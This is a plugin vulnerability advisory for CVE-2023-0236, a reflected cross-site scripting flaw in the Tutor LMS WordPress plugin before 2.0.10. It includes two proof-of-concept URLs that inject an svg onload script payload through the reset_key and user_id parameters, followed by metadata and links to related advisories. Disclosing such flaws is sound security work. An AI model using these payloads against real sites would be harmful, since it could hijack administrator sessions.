Tutor LMS < 2.0.10 – Reflected Cross-Site Scripting | CVE 2023-0236 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the reset_key and user_id parameters before outputting then back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

https://example.com/dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(/XSS/)%3E&user_id=dd

https://example.com/dashboard/retrieve-password/?reset_key=a&user_id=%22%3E%3Csvg%20onload=prompt(/XSS/)%3E

Affects Plugins

Fixed in 2.0.10

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

So Sakaguchi

Submitter

So Sakaguchi

Submitter twitter

Verified

Yes

WPVDB ID

503835db-426d-4b49-85f7-c9a20d6ff5b8

Timeline

Publicly Published

2023-01-12 (about 3 years ago)

Added

2023-01-12 (about 3 years ago)

Last Updated

2023-01-12 (about 3 years ago)

Other

Published

Title

Published

2022-05-09

Title

External Links in New Window / New Tab < 1.43 - Unauthenticated Stored Cross-Site Scripting

Published

2025-12-31

Title

Dashboard Beacon <= 1.2.0 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2025-01-30

Title

Contact Form and Calls To Action by vcita <= 2.7.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-06-16

Title

WordPress Infinite Scroll – Ajax Load More < 7.4.1 - Authenticated(Contributor+) Stored Cross-Site Scripting

Published

2016-08-27

Title

404 to 301 <= 2.3.0 - Unauthenticated Stored Cross-Site Scripting (XSS)